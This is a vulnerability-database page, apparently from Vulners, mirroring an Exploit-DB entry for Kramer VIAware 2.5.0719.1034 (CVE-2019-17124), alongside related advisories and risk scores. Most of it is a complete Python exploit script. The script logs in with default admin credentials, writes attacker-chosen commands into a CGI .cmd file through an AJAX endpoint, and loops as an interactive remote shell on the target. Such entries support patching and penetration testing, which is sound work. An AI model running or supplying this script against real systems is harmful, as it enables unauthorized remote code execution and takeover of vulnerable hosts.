Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)

šŸ—“ļøĀ 30 Mar 2022Ā 00:00:00Reported byĀ sharkmoosTypeĀ 
exploitdb
Ā exploitdbšŸ”—Ā www.exploit-db.comšŸ‘Ā 295Ā Views

Kramer VIAware 2.5.0719.1034 Remote Code Execution via adminLogin functio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Kramer VIAware 2.5.0719.1034 - Remote Code Execution Exploit
30 Mar 202200:00
ā€“zdt
GithubExploit		Exploit for Incorrect Default Permissions in Kramerav Viaware
9 Oct 201904:10
ā€“githubexploit
ATTACKERKB		CVE-2021-36356
31 Aug 202100:00
ā€“attackerkb
Circl		CVE-2019-17124
31 Aug 202107:33
ā€“circl
CVE		CVE-2019-17124
9 Oct 201915:44
ā€“cve
Cvelist		CVE-2019-17124
9 Oct 201915:44
ā€“cvelist
NVD		CVE-2019-17124
9 Oct 201916:15
ā€“nvd
OSV		CVE-2019-17124
9 Oct 201916:15
ā€“osv
OSV		CVE-2021-36356
31 Aug 202104:15
ā€“osv
Packet Storm		Kramer VIAware 2.5.0719.1034 Remote Code Execution
30 Mar 202200:00
ā€“packetstorm
Rows per page
# Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)
# Date: 28/03/2022
# Exploit Author: sharkmoos & BallO
# Vendor Homepage: https://www.kramerav.com/
# Software Link: https://www.kramerav.com/us/product/viaware
# Version: 2.5.0719.1034
# Tested on: ViaWare Go (Windows 10)
# CVE : CVE-2019-17124

import requests, sys, urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def adminLogin(s, host, username, password):
    headers = {
        "Host": f"{host}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-GB,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": f"https://{host}",
        "Referer": f"https://{host}/admin/login.php",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Sec-Gpc": "1",
        "Te": "trailers",
        "Connection": "close"
        }
    data = {
        "txtUserId": username,
        "txtPwd": password,
        "btnOk" :"Login"
        }
    response = s.post(f"https://{host}/admin/login.php", verify=False)
    if len(s.cookies) < 1:
        return False
    else:
        return True


def writeCommand(session, host, command):
    headers = {
    "Host": f"{host}",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
    "Accept": "text/html, */*",
    "Accept-Language": "en-GB,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": f"https://{host}",
    "Referer": f"https://{host}/browseSystemFiles.php?path=C:\Windows&icon=browser",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Gpc": "1",
    "Te": "trailers",
    "Connection": "close"
    }
    data = {
        "radioBtnVal":f"{command}",
        "associateFileName": "C:/tc/httpd/cgi-bin/exploit.cmd"
        }
    session.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data)


def getResult(session, host):
    file = session.get(f"https://{host}/cgi-bin/exploit.cmd", verify=False)
    pageText = file.text
    if len(pageText) < 1:
        result = "Command did not return a result"
    else:
        result = pageText
    return result

        

def main(host, username="su", password="supass"):
    s = requests.Session()
    # comment this line to skip the login stage    
    loggedIn = adminLogin(s, host, username, password)
    
    if not loggedIn:
        print("Could not successfully login as the admin")
        sys.exit(1)
    else:
        pass

    command = ""
    while command != "exit":
        command = input("cmd:> ").strip()
        writeCommand(s, host, command)
        print(getResult(s, host))
    exit()

if __name__ == "__main__":
    
    args = sys.argv
    numArgs = len(args)
    if  numArgs < 2:
        print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")
        print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")
    if numArgs == 2:
        main(args[1])
    if numArgs == 4:
        main(args[1], args[2], args[3])
    if numArgs > 4:
        print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")
        print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Mar 2022 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
CVSS 210
EPSS0.23812
kramer viawareremote code executionadminlogin functioncve-2019-17124windows 10http requestsinsecurerequestwarningsecurity vulnerability
295